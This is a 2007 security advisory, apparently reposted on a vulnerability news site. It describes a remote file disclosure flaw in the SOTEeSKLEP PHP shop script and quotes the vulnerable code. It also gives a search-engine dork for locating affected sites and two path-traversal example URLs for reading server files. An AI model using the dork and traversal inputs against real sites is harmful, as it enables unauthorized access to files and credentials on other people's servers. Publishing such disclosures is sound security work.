Computer Security

Security Advisory: SOTEeSKLEP Remote File Disclosure Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  mcNews (skinfile) Remote File Include Vulnerability

  Beautifier Version 0.1 Remote File Include Vulnerability // MefistoLabs.Com

  Lib2 PHP v0.2 (DOCUMENT_ROOT)
Remote File Inclusion Vulnerability

  php-stats xss whois.php

From:theoden_(at)_interia.pl <theoden_(at)_interia.pl>
Date:13.08.2007
Subject:SOTEeSKLEP Remote File Disclosure Vulnerability

SOTEeSKLEP Remote File Disclosure Vulnerability

Script : SOTEeSKLEP

Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other.

Site : http://www.sote.pl

Bug:

...
if (! empty($_REQUEST["file"])) { $file=$_REQUEST['file']; }
...
$file_path="$DOCUMENT_ROOT/themes/_$config-
>lang/_html_files/$file";
if (file_exists($file_path)) { $fd=fopen($file_path,"r");
$data=fread($fd,filesize($file_path));
print $data;
fclose($fd);
}
...

Dork: inurl:"/go/_files/?file="

Examples:
http://???/go/_files/?file=./.././.././.././
http://???/go/_files/?file=./.././.././.././go/_files/index.php

Discovered by dun
2007.08.11

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server